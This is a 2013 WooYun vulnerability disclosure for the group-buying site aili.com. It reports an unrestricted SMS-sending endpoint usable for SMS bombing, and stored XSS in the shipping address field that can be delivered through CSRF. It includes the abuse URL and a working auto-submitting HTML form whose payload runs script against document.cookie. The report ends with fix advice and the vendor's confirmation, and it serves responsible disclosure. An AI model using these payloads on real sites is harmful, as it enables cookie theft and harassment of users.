当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-019208

漏洞标题:爱丽网猥琐跨站+短信接口

相关厂商:aili.com

漏洞作者: 小胖胖要减肥

提交时间:2013-02-26 13:29

修复时间:2013-04-12 13:30

公开时间:2013-04-12 13:30

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-02-26: 细节已通知厂商并且等待厂商处理中
2013-02-26: 厂商已经确认,细节仅向厂商公开
2013-03-08: 细节向核心白帽子及相关领域专家公开
2013-03-18: 细节向普通白帽子公开
2013-03-28: 细节向实习白帽子公开
2013-04-12: 细节向公众公开

简要描述:

爱丽网猥琐跨站+短信接口

详细说明:

爱丽团购也算比较大的一个团购网站
应该对安全问题重视程度比较高
找到2个小问题
1 任意短信接口,无需登录,无限制,可以作为短信轰炸器接口
http://tuan.27.cn/account/ajax.php?action=bindcode&v=13800138000

漏洞证明:

2 收货地址xss,能够打客服,没有尝试,因为公司不能上qq,客服为qq客服,本来觉得好还吧
但是普遍类似的地方都没有csrf防御,测试了一下,可以csrf,那么也可以对个人进行xss了
poc如下

<html>
<body>
<form id="wrhoooo" name="wrhoooo" action="http://tuan.27.cn/account/setaddress.php" method="post">
<input type="test" name="province" value="上海" />
<input type="test" name="area" value="上海市" />
<input type="test" name="city" value="黄浦区" />
<input type="test" name="street" value='"/><script>alert(document.cookie)</script>' />
<input type="test" name="zipcode" value="123456" />
<input type="test" name="name" value="张朔" />
<input type="test" name="mobile" value="13800138000" />
</form>
<script>
document.wrhoooo.submit();
</script>
</body>
</html>


至于怎么让用户访问只要发微薄或其他地方让那些经常上爱丽网的朋友点击该链接即可,看看访问后的效果

aili1.jpg


aili2.jpg

修复方案:

2个漏洞都是小问题,但一个可以任意访问,另外一个又能打客服又能打用户相对来说有点影响
修复很简单
1 短信接口限制发送次数
2 对于收获地址各个字段进行过滤,对于影响用户的csrf关键点加上token

版权声明:转载请注明来源 小胖胖要减肥@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-02-26 13:33

厂商回复:

两个问题,虽然小,但影响可能会较大。因此考虑中上平级!

最新状态:

暂无